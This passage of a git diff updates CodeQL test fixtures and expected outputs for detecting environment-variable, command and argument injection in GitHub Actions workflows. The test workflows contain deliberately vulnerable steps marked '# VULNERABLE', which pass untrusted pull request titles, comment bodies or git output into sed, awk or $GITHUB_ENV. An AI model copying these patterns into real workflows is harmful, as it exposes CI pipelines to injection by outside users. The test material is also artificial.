'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref index b3f6c4bf782..450079a19f6 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvVarInjectionCritical.ql +query: Security/CWE-077/EnvVarInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 94e2af8ecaa..b751cd05888 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | @@ -92,4 +93,3 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref index fc6a3a80c98..cfc44d8a86d 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvVarInjectionMedium.ql +query: Security/CWE-077/EnvVarInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml index 4b6888449c0..b7968c4f7a6 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml +++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml @@ -6,4 +6,4 @@ jobs: steps: - uses: ruby/setup-ruby@v2 with: - ruby-version: ${{ github.event.comment.body }} + ruby-version: ${{ github.event.comment.body }} # $ Alert[actions/command-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index 281fd39552a..7e3d87977b1 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -1,6 +1,6 @@ +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref index 7057e60695b..3dc57e81d63 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-078/CommandInjectionCritical.ql +query: experimental/Security/CWE-078/CommandInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 99ebb1edc05..be81405805b 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,5 +1,5 @@ +#select edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref index 9fbbb302a17..41310436d7e 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-078/CommandInjectionMedium.ql +query: experimental/Security/CWE-078/CommandInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 5d841e50dbb..2566f6cc674 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -7,7 +7,7 @@ jobs: test1: runs-on: ubuntu-latest env: - TITLE: ${{github.event.pull_request.title}} + TITLE: ${{github.event.pull_request.title}} # $ Source[actions/argument-injection/critical] steps: - name: Checkout uses: actions/checkout@v4 @@ -18,50 +18,50 @@ jobs: echo "s/FOO/$TITLE/g" - run: | # VULNERABLE - sed "s/FOO/$TITLE/g" + sed "s/FOO/$TITLE/g" # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - echo "foo" | sed "s/FOO/$TITLE/g" > bar + echo "foo" | sed "s/FOO/$TITLE/g" > bar # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) + echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - awk "BEGIN {$TITLE}" + awk "BEGIN {$TITLE}" # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json + sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json + sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE sed -e 's##${TITLE}#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##TITLE#' \ - .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE sed -e 's##TITLE#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ - .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git log --format=%s) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git diff --name-only HEAD) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git diff --name-only HEAD ) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git diff --name-only HEAD^ | xargs) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # NOT VULNERABLE echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 5eddb791ae5..4f4d67c2325 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -1,3 +1,16 @@ +#select +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | @@ -20,16 +33,3 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths -#select -| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed 